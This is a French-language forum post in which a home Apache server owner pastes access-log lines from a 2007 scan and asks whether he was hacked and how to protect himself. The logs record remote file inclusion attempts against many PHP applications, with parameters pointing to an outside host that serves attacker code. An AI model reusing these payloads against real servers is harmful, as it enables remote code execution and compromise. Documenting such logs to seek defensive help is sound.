Bonjour,
J'ai installé un serveur apache sur ma machine pour usage personnel et pour que des amis puisse y accéder. L'usage est assez rare, surtout de l'exterieur.
Je me baladait dans mes repertoires et j'ai remarqué des fichiers sessions dans le repertoire prévu pour. j'ai voulu regarder les logs d'acces pour savoir ce qui était demandé et j'ai trouvé ça (j'ai pas tout mis):
Code :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| 193.224.128.245 - - [15/Sep/2007:21:09:08 +0200] "GET /send_reminders.php?includedir=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 216
193.224.128.245 - - [15/Sep/2007:21:09:08 +0200] "GET /index.php?page=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 200 1254
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /phplive/help.php?css_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 214
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /index.php?page=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 200 1254
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /admin.php?cal_dir=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 207
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /common_include/common.php?commonIncludePath=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 223
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /phpnuke/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 256
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /SQuery/lib/armygame.php?libpath=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 221
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /myevent/event.php?myevent_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 215
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /admin.php?DFORUM_PATH=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 207
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /kernel/loadkernel.php?installPath=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 219
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 208
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 213
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 218
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 227
193.224.128.245 - - [15/Sep/2007:21:09:11 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 230 |
il vas sans dire que 193.224.128.245 n'est pas mon ip, que la plupart des urls demandées nexistent pas.
J'en conclu que c'est une tentative de hack.
Le phénoméne s'est reproduit le 20/sep/2007 avec une autre IP et il semblerait qu'il y ait eu un acces au fichier phpmyadmin /libraries/select_lang.lib.php (j'ai modifié le nom du répertoire apres cà)
Est-il possible que le hacker ai pu accéder a ma machine?
Comment est-il possible de se protéger de ce genre de scan?
merci.
22/09/2007, 21h32
Christophe ASTIER
Tentative de piratage?
00
